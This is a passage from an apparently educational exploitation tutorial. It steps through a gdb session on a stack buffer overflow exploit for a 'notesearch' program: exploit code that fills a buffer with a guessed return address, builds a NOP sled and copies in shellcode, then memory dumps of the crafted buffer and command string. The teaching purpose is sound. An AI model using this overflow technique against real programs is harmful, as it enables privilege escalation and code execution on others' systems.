Graphics Programs Reference
In-Depth Information
20 offset = atoi(argv[1]);
(gdb)
21
22 ret = (unsigned int) &i - offset; // Set return address.
23
24 for(i=0; i < 160; i+=4) // Fill buffer with return address.
25 *((unsigned int *)(buffer+i)) = ret;
26 memset(buffer, 0x90, 60); // Build NOP sled.
27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
28
29 strcat(command, "\'");
30
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.
(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.
(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.
( gdb)
The notesearch exploit generates a buffer in lines 24 through 27 (shown
above in bold). The first part is a for loop that fills the buffer with a 4-byte
address stored in the ret variable. The loop increments i by 4 each time. This
value is added to the buffer address, and the whole thing is typecast as a
unsigned integer pointer. This has a size of 4, so when the whole thing is
dereferenced, the entire 4-byte value found in ret is written.
(gdb) run
Starting program: /home/reader/booksrc/a.out
Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:26
26 memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/40x buffer
0x804a016: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a026: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a036: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a046: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
(gdb) x/s command
0x804a008: "./notesearch
'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶û
ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)
At the first breakpoint, the buffer pointer shows the result of the for
loop. You can also see the relationship between the command pointer and
the buffer pointer. The next instruction is a call to memset() , which starts at the
beginning of the buffer and sets 60 bytes of memory with the value 0x90 .
Search WWH ::




Custom Search